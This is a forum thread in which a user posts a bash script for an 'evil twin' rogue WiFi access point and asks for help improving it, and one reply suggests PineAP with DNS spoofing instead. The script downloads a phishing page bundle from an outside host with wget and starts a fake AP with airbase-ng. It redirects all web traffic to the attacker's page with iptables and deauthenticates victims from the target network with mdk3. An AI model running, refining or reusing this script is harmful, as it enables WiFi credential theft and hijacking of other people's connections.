[Help Request] Eviltwin

[sithstalker]

I'm working on an eviltwin infusion for the pineapple but still have a long way to go. So far Im writting an eviltwin script without the pineapple to make sure I get that right. The script still need some work. I need help to improve it. Im writting the script base on this video

#touch eviltwin

#nano eviltwin (copy & paste script)

#chmod +x eviltwin

#./eviltwin

(This will not setup your mysql database)

#!/bin/bash

##########################################
# Evil Twin Access Point v0.1 #
# #
# written by: sithstalker #
# not yet tested on wifi pineapple #
##########################################

#Downloading www files

echo "downloading www files..."

DIR1="/var/www/styles"

if [ -d "$DIR1" ]; then
echo "You already have the eviltwin files..."
sleep 2;
else
echo "Getting the /var/www eviltwin files and creating backup to /var/orig-www"
sleep 2;
mkdir /var/orig-www && mv /var/www/* /var/orig-www/
cd /var/www && wget http://hackthistv.com/eviltwin.zip
sleep 2;
unzip eviltwin.zip
sleep 2;
fi

#Killing active processes
echo "Killing airbase-ng"
pkill airbase-ng
sleep 2;
echo "Killing dhcpd"
pkill dhcpd3
sleep 2;

#Getting required informations
echo -n "Enter you local ip address and press [ENTER] (e.g. 192.168.1.45): "
read lhost
echo -n "Enter your wlan interface and press [ENTER] (e.g. wlan0): "
read wlan_int
echo -n "Enter the subnet for your DHCP scope and press [ENTER] (e.g. 192.168.1.128): "
read dhcp_subnet
echo -n "Enter the subnetmask for your DHCP scope and press [ENTER] (e.g. 255.255.255.128): "
read dhcp_subnetmask
echo -n "Enter the broadcast address for your dhcp scope and press [ENTER] (e.g. 192.168.1.255): "
read dhcp_broadcast
echo -n "Enter the default gateway for your DHCP Scope and press [ENTER] (e.g. 192.168.1.129): "
read dhcp_dgw
echo -n "Enter the DNS Server for your DHCP Scope and press [ENTER] (e.g. 8.8.8.8): "
read dhcp_dns
echo -n "Enter the start address of your DHCP scope and press [ENTER] (e.g. 192.168.1.100): "
read dhcp_start
echo -n "Enter the last address of your DHCP scope and press [ENTER] (e.g. 192.168.1.150): "
read dhcp_last
echo -n "Enter the SSID you like to use for your Access Point and press [ENTER] (e.g. eviltwin): "
read ssid
echo -n "Enter the Channel you like to use for your Access Point and press [ENTER] (e.g. 11): "
read channel
echo -n "Enter the interface name which is connected to the internet and press [ENTER] (e.g. eth0): "
read inet_int
echo -n "Enter the target Bssid and press [ENTER] (e.g. SI:TH:ST:AL:KE:R0): "
read bssid

#Setting dhcpd config to /etc/dhcp3/dhcpd.conf
echo "setting dhcpd config in /etc/dhcp/dhcpd.conf"
sleep 2;
#check if there already is a backup directory for the original dhcpd.conf file

DIR="/etc/dhcp/orig_conf"

if [ -d "$DIR" ]; then
echo "You already have a backup directory for the original dhcpd.conf"
sleep 2;
else
echo "You do not have a backup directory for the original dhcpd.conf file... I will create one"
sleep 2;
mkdir /etc/dhcp/orig_conf
fi

#check if there already is a backup of the original dhcpd.conf file. If not one will be created
if [ "$(ls -A $DIR)" ]; then
echo "You already have a backup of the original configuration file in /etc/dhcp/orig_conf"
sleep 2;
else
echo "creating backup of original dhcpd config file to /etc/dhcp/orig_conf"
sleep 2;
cp /etc/dhcp/dhcpd.conf /etc/dhcp/orig_conf/dhcpd.conf
rm /etc/dhcp/dhcpd.conf
fi

echo "default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet $dhcp_subnet netmask $dhcp_subnetmask {
option subnet-mask $dhcp_subnetmask;
option broadcast-address $dhcp_broadcast;
option routers $dhcp_dgw;
option domain-name-servers $dhcp_dns;
range $dhcp_start $dhcp_stop; }" > /etc/dhcp/dhcpd.conf

#Starting monitor mode on $wlan_int
echo "putting $wlan_int into monitor mode. You can check that later by using iwconfig command"
sleep 2;
airmon-ng stop $wlan_int
sleep 5;
airmon-ng start $wlan_int
sleep 5;

###################################################################
#Starting airbase-ng with SSID=$ssid and channel=$channel
echo "starting airbase-ng with SSID $ssid and channel $channel"
sleep 2;
airbase-ng -e $ssid -c $channel -P mon1 &
sleep 5;

###################################################################


#starting new generated interface at0 and assign ip address
echo "starting at0 with ip $dhcp_dgw and subnetmask $dhcp_subnet and create a route for that"
sleep 2;
ifconfig at0 down
sleep 2;
ifconfig at0 $dhcp_dgw netmask $dhcp_subnetmask
sleep 2;
ifconfig at0 up
sleep 2;
route add -net $dhcp_subnet netmask $dhcp_subnetmask gw $dhcp_dgw
sleep 2;

#Setup iptables with nat for the new network
echo "setting up iptables with nat for the new network"
sleep 2;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
#iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $inet_int -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $lhost:80
iptables -t nat -A POSTROUTING -j MASQUERADE



#Clear DHCP leases
echo "clearing dhcp leases"
sleep 2;
echo > '/var/lib/dhcp/dhcpd.leases'

#creating a symlink to dhcpd.pid
#ln -s /var/run/dhcp3-server/dhcp.pid /var/run/dhcpd.pid

#start dhcp server and enable ip forwarding
echo "starting dhcp and enabling ip forwarding"
sleep 2;
#dhcpd3 -d -f -cf /etc/dhcp/dhcpd.conf at0 &
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
echo "1" > /proc/sys/net/ipv4/ip_forward
/etc/init.d/isc-dhcp-server start

echo $bssid > blacklist
mdk3 mon1 d -b blacklist -c $channel

[bytedeez]

Correct me if i'm wrong. but can't one achieve the same results using PineAP and Dns Spoof.

Not trying to shut you down, just seems kind of redundant.